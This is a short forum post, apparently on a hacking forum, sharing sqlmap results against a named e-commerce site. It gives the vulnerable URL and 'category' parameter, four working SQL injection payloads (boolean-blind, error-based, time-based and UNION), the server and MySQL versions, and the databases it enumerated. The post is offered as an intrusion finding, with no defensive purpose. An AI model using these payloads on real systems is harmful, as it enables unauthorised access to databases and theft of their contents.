
01.05.2016, 00:12
Forum member
Registered: 25.04.2013
Posts: 153
With us: 6868406
Reputation: 2
Code:
http://www.dealigg.com/index.php?page=2&category=ApparelShoes (GET)
Parameter: category (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=2&category=ApparelShoes' AND 9810=9810 AND 'aHPZ'='aHPZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: page=2&category=ApparelShoes' AND (SELECT 9690 FROM(SELECT COUNT(*),CONCAT(0x716a716b71,(SELECT (ELT(9690=9690,1))),0x71706a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rueO'='rueO
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: page=2&category=ApparelShoes' OR SLEEP(5) AND 'YOBs'='YOBs
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: page=2&category=-4553' UNION ALL SELECT CONCAT(0x716a716b71,0x786943664e5a70716c6e7a71727a774b55506a74774f78446271567a747359757950414548467768,0x71706a7171)-- -
---
web application technology: PHP 5.4.16
back-end DBMS: MySQL 5.0
available databases [3]:
[*] dealdb
[*] information_schema
[*] test
Otherwise it's all just small fry and more small fry!
